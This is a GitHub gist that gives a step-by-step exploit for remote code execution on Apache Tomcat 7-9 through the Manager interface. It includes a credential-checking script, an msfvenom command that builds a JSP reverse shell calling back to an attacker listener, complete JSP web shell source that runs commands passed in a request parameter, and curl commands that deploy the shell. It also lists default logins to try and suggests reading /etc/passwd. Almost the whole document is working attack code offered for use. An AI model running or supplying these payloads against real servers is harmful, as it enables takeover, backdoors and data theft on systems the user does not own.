Skip to content

Instantly share code, notes, and snippets.

@strikoder
Last active June 1, 2026 21:40
Show Gist options
  • Select an option

  • Save strikoder/26d9fce21c23d1b94a66b8f880e37db3 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/26d9fce21c23d1b94a66b8f880e37db3 to your computer and use it in GitHub Desktop.
Apache Tomcat 7-9 Manager RCE via WAR deployment - Exploit authenticated access to deploy malicious WAR files for remote code execution

Exploitation Steps

1. Test API Access & Validate Credentials

# Set variables
USER="tomcat"
PASS="password"
RHOST="10.10.10.194"
RPORT="8080"

# Color codes for output
R='\033[0;31m'
G='\033[0;32m'
C='\033[0;36m'
W='\033[0m'

# Test credentials against manager API
SCODE=$(curl -u $USER:$PASS -s -o /dev/null -w "%{http_code}" http://$RHOST:$RPORT/manager/text)

if [ $SCODE == 401 ]; then
    echo -e $R"[-]$C Incorrect Username/Password!"$W
    exit
elif [ $SCODE == 200 ]; then
    echo -e $G"[+]$C Login Successful!\n"$W
else
    echo "[-] Status Code:" $SCODE
    exit
fi

2. Create Malicious WAR File

Option A: Reverse Shell (MSFVenom)

# Generate JSP reverse shell WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war > payload.war

# Start listener
nc -lvnp 4444

Option B: Web Command Shell

Create cmdjsp.jsp:

// note that linux = cmd and windows = "cmd.exe /c + cmd", u can change the method, input name and getparam as well
<FORM METHOD=GET ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";

if(cmd != null) {
    String s = null;
    try {
        // For Linux, use: exec(cmd)
        // For Windows, use: exec("cmd.exe /C " + cmd)
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) {
            output += s + "\n";
        }
    } catch(IOException e) {
        e.printStackTrace();
    }
}
%>

<pre>
<%=output %>
</pre>

Note: bash -c or nc won't work with this shell probably, you better use the msf or upload the shell with the webshell then execute with bash /tmp/shell.sh

Source: tennc/webshell

Note: Modify for target OS:

  • Linux: Runtime.getRuntime().exec(cmd)
  • Windows: Runtime.getRuntime().exec("cmd.exe /C " + cmd)

3. Package as WAR File

# Create WAR archive (WAR files are just ZIP files)
zip cmdjsp.war cmdjsp.jsp

4. Deploy WAR via Manager API

# Upload and deploy WAR file
curl -T cmdjsp.war -u 'tomcat:password' "http://$RHOST:$RPORT/manager/text/deploy?path=/app"
# or curl -u $USER:$PASS --upload-file payload.war "http://$RHOST:$RPORT/manager/text/deploy?path=/shell&update=true"
# Expected response:
# OK - Deployed application at context path [/app]

5. Access Deployed Webshell

# Navigate to deployed application
http://$RHOST:$RPORT/app/cmdjsp.jsp

# Execute commands through web interface
# Example: whoami, id, cat /etc/passwd

Common Default Credentials

tomcat:tomcat
admin:admin
tomcat:s3cret
admin:password

Tested Versions

  • Apache Tomcat 7.x
  • Apache Tomcat 8.x
  • Apache Tomcat 9.x
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment